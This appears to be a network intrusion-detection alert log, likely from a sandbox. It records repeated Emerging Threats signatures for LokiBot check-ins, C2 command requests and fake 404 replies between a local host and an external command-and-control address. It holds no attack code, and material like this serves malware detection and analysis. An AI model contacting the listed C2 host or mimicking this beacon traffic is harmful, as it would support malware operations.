12/21/20-08:34:19.810534	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49259	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.810534	TCP	2025381	ET TROJAN LokiBot Checkin	49259	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.810534	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49259	80	192.168.2.22	185.193.143.118
12/21/20-08:34:19.810534	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49259	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.007169	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49259	185.193.143.118	192.168.2.22
12/21/20-08:34:20.265620	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49260	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.265620	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49260	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.265620	TCP	2025381	ET TROJAN LokiBot Checkin	49260	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.265620	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49260	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.265620	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49260	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.447707	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49260	185.193.143.118	192.168.2.22
12/21/20-08:34:20.716353	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49261	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.716353	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49261	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.716353	TCP	2025381	ET TROJAN LokiBot Checkin	49261	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.716353	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49261	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.716353	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49261	80	192.168.2.22	185.193.143.118
12/21/20-08:34:20.916420	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49261	185.193.143.118	192.168.2.22
12/21/20-08:34:21.162199	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49262	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.162199	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49262	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.162199	TCP	2025381	ET TROJAN LokiBot Checkin	49262	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.162199	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49262	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.162199	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49262	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.349723	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49262	185.193.143.118	192.168.2.22
12/21/20-08:34:21.617247	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49263	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.617247	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49263	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.617247	TCP	2025381	ET TROJAN LokiBot Checkin	49263	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.617247	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49263	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.617247	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49263	80	192.168.2.22	185.193.143.118
12/21/20-08:34:21.806761	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49263	185.193.143.118	192.168.2.22
12/21/20-08:34:22.049658	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49264	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.049658	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49264	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.049658	TCP	2025381	ET TROJAN LokiBot Checkin	49264	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.049658	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49264	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.049658	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49264	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.237977	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49264	185.193.143.118	192.168.2.22
12/21/20-08:34:22.498814	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49265	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.498814	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49265	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.498814	TCP	2025381	ET TROJAN LokiBot Checkin	49265	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.498814	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49265	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.498814	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49265	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.684316	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49265	185.193.143.118	192.168.2.22
12/21/20-08:34:22.936532	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49266	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.936532	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49266	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.936532	TCP	2025381	ET TROJAN LokiBot Checkin	49266	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.936532	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49266	80	192.168.2.22	185.193.143.118
12/21/20-08:34:22.936532	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49266	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.116629	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49266	185.193.143.118	192.168.2.22
12/21/20-08:34:23.377784	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49267	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.377784	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49267	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.377784	TCP	2025381	ET TROJAN LokiBot Checkin	49267	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.377784	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49267	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.377784	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49267	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.570331	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49267	185.193.143.118	192.168.2.22
12/21/20-08:34:23.832815	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49268	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.832815	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49268	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.832815	TCP	2025381	ET TROJAN LokiBot Checkin	49268	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.832815	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49268	80	192.168.2.22	185.193.143.118
12/21/20-08:34:23.832815	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49268	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.179902	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49268	185.193.143.118	192.168.2.22
12/21/20-08:34:24.436787	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49269	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.436787	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49269	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.436787	TCP	2025381	ET TROJAN LokiBot Checkin	49269	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.436787	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49269	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.436787	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49269	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.625038	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49269	185.193.143.118	192.168.2.22
12/21/20-08:34:24.899040	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49270	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.899040	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49270	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.899040	TCP	2025381	ET TROJAN LokiBot Checkin	49270	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.899040	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49270	80	192.168.2.22	185.193.143.118
12/21/20-08:34:24.899040	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49270	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.087898	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49270	185.193.143.118	192.168.2.22
12/21/20-08:34:25.357432	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49271	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.357432	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49271	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.357432	TCP	2025381	ET TROJAN LokiBot Checkin	49271	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.357432	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49271	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.357432	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49271	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.545368	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49271	185.193.143.118	192.168.2.22
12/21/20-08:34:25.805295	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49272	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.805295	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49272	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.805295	TCP	2025381	ET TROJAN LokiBot Checkin	49272	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.805295	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49272	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.805295	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49272	80	192.168.2.22	185.193.143.118
12/21/20-08:34:25.998563	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49272	185.193.143.118	192.168.2.22
12/21/20-08:34:26.254644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49273	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.254644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49273	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.254644	TCP	2025381	ET TROJAN LokiBot Checkin	49273	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.254644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49273	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.254644	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49273	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.454014	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49273	185.193.143.118	192.168.2.22
12/21/20-08:34:26.704234	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49274	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.704234	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49274	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.704234	TCP	2025381	ET TROJAN LokiBot Checkin	49274	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.704234	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49274	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.704234	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49274	80	192.168.2.22	185.193.143.118
12/21/20-08:34:26.890527	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49274	185.193.143.118	192.168.2.22
12/21/20-08:34:27.150379	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49275	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.150379	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49275	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.150379	TCP	2025381	ET TROJAN LokiBot Checkin	49275	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.150379	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49275	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.150379	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49275	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.339108	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49275	185.193.143.118	192.168.2.22
12/21/20-08:34:27.608122	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49276	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.608122	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49276	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.608122	TCP	2025381	ET TROJAN LokiBot Checkin	49276	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.608122	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49276	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.608122	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49276	80	192.168.2.22	185.193.143.118
12/21/20-08:34:27.797706	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49276	185.193.143.118	192.168.2.22
12/21/20-08:34:28.088721	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49277	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.088721	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49277	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.088721	TCP	2025381	ET TROJAN LokiBot Checkin	49277	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.088721	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49277	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.088721	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49277	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.281017	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49277	185.193.143.118	192.168.2.22
12/21/20-08:34:28.539101	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49278	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.539101	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49278	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.539101	TCP	2025381	ET TROJAN LokiBot Checkin	49278	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.539101	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49278	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.539101	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49278	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.733897	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49278	185.193.143.118	192.168.2.22
12/21/20-08:34:28.979677	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49279	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.979677	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49279	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.979677	TCP	2025381	ET TROJAN LokiBot Checkin	49279	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.979677	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49279	80	192.168.2.22	185.193.143.118
12/21/20-08:34:28.979677	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49279	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.168517	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49279	185.193.143.118	192.168.2.22
12/21/20-08:34:29.425876	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49280	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.425876	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49280	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.425876	TCP	2025381	ET TROJAN LokiBot Checkin	49280	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.425876	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49280	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.425876	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49280	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.607997	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49280	185.193.143.118	192.168.2.22
12/21/20-08:34:29.858240	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49281	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.858240	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49281	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.858240	TCP	2025381	ET TROJAN LokiBot Checkin	49281	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.858240	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49281	80	192.168.2.22	185.193.143.118
12/21/20-08:34:29.858240	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49281	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.288894	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49281	185.193.143.118	192.168.2.22
12/21/20-08:34:30.558440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49282	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.558440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49282	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.558440	TCP	2025381	ET TROJAN LokiBot Checkin	49282	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.558440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49282	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.558440	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49282	80	192.168.2.22	185.193.143.118
12/21/20-08:34:30.894018	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49282	185.193.143.118	192.168.2.22
12/21/20-08:34:31.178417	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49283	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.178417	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49283	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.178417	TCP	2025381	ET TROJAN LokiBot Checkin	49283	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.178417	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49283	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.178417	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49283	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.375860	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49283	185.193.143.118	192.168.2.22
12/21/20-08:34:31.619491	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49284	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.619491	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49284	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.619491	TCP	2025381	ET TROJAN LokiBot Checkin	49284	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.619491	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49284	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.619491	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49284	80	192.168.2.22	185.193.143.118
12/21/20-08:34:31.834973	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49284	185.193.143.118	192.168.2.22
12/21/20-08:34:32.089106	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49285	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.089106	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49285	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.089106	TCP	2025381	ET TROJAN LokiBot Checkin	49285	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.089106	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49285	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.089106	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49285	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.573481	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49285	185.193.143.118	192.168.2.22
12/21/20-08:34:32.827429	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49286	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.827429	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49286	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.827429	TCP	2025381	ET TROJAN LokiBot Checkin	49286	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.827429	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49286	80	192.168.2.22	185.193.143.118
12/21/20-08:34:32.827429	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49286	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.016666	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49286	185.193.143.118	192.168.2.22
12/21/20-08:34:33.287630	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49287	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.287630	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49287	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.287630	TCP	2025381	ET TROJAN LokiBot Checkin	49287	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.287630	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49287	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.287630	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49287	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.480140	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49287	185.193.143.118	192.168.2.22
12/21/20-08:34:33.749305	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49288	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.749305	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49288	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.749305	TCP	2025381	ET TROJAN LokiBot Checkin	49288	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.749305	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49288	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.749305	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49288	80	192.168.2.22	185.193.143.118
12/21/20-08:34:33.942081	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49288	185.193.143.118	192.168.2.22
12/21/20-08:34:34.328590	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49289	80	192.168.2.22	185.193.143.118
12/21/20-08:34:34.328590	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49289	80	192.168.2.22	185.193.143.118
12/21/20-08:34:34.328590	TCP	2025381	ET TROJAN LokiBot Checkin	49289	80	192.168.2.22	185.193.143.118
12/21/20-08:34:34.328590	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49289	80	192.168.2.22	185.193.143.118
12/21/20-08:34:34.328590	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49289	80	192.168.2.22	185.193.143.118
12/21/20-08:34:34.518873	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49289	185.193.143.118	192.168.2.22
12/21/20-08:34:35.213001	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49290	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.213001	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49290	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.213001	TCP	2025381	ET TROJAN LokiBot Checkin	49290	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.213001	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49290	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.213001	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49290	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.405753	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49290	185.193.143.118	192.168.2.22
12/21/20-08:34:35.946670	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49291	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.946670	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49291	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.946670	TCP	2025381	ET TROJAN LokiBot Checkin	49291	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.946670	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49291	80	192.168.2.22	185.193.143.118
12/21/20-08:34:35.946670	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49291	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.130556	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49291	185.193.143.118	192.168.2.22
12/21/20-08:34:36.385445	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49292	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.385445	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49292	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.385445	TCP	2025381	ET TROJAN LokiBot Checkin	49292	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.385445	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49292	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.385445	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49292	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.570178	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49292	185.193.143.118	192.168.2.22
12/21/20-08:34:36.835883	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49293	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.835883	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49293	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.835883	TCP	2025381	ET TROJAN LokiBot Checkin	49293	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.835883	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49293	80	192.168.2.22	185.193.143.118
12/21/20-08:34:36.835883	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49293	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.022112	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49293	185.193.143.118	192.168.2.22
12/21/20-08:34:37.281356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49294	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.281356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49294	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.281356	TCP	2025381	ET TROJAN LokiBot Checkin	49294	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.281356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49294	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.281356	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49294	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.475840	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49294	185.193.143.118	192.168.2.22
12/21/20-08:34:37.759174	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49295	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.759174	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49295	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.759174	TCP	2025381	ET TROJAN LokiBot Checkin	49295	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.759174	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49295	80	192.168.2.22	185.193.143.118
